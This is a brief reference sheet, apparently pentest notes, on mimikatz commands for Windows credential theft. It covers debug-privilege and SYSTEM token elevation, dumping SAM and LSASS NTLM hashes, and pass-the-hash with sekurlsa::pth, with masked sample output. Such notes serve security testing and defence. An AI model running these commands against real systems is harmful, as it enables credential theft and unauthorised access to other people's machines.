mimikatz

Resources

  1. The Hacker Tools

Basic commands

  1. Enable the debug privilege (SeDebugPrivilege) for the mimikatz process:

privilege::debug

  • Required to perform actions such as lsadump::sam later on

mimikatz # privilege::debug
Privilege '20' OK

  2. Impersonate a token:

token::elevate

  • in particular, the SYSTEM token (NT AUTHORITY\SYSTEM)

mimikatz # token::elevate

Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

660     xxxx         NT AUTHORITY\SYSTEM     xxxx       (04g,21p)       Primary
 -> Impersonated !
 * Process Token : xxxx     XXXX     xxxx   (12g,24p)  Primary
 * Thread Token  : {0;000003e7} 1 D 1309519     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

  3. Dump the local Security Account Manager (SAM) NT hashes:

lsadump::sam

mimikatz # lsadump::sam
Domain : xxxx
SysKey : xxxx
Local SID : xxxx

SAMKey : xxxx

RID  : xxxx (500)
User : Administrator
  Hash NTLM: xxxx

...

  4. Dump NT hashes from LSASS by querying the MSV1_0 authentication package:

lsadump::msv

mimikatz # lsadump::msv

Authentication Id : 0 ; xxxx (00000000:0004b39c)
Session           : RemoteInteractive from 2 
User Name         : xxxx
Domain            : xxxx
Logon Server      : xxxx
...

        msv :
         [00000003] Primary
         * Username : xxxx
         * Domain   : xxxx
         * NTLM     : xxxx

...

  5. Revert to the token mimikatz had at startup:

token::revert

mimikatz # token::revert

  6. Perform Pass-the-Hash, Pass-the-Key or Overpass-the-Hash:

sekurlsa::pth

mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<nt_hash> /run:"<command_to_run>"

a. /user : username to impersonate

b. /domain : fully qualified domain name

c. /ntlm : NT hash

d. /run : command to run

  • according to The Hacker Tools (see the link under "Resources" above), it defaults to cmd.exe
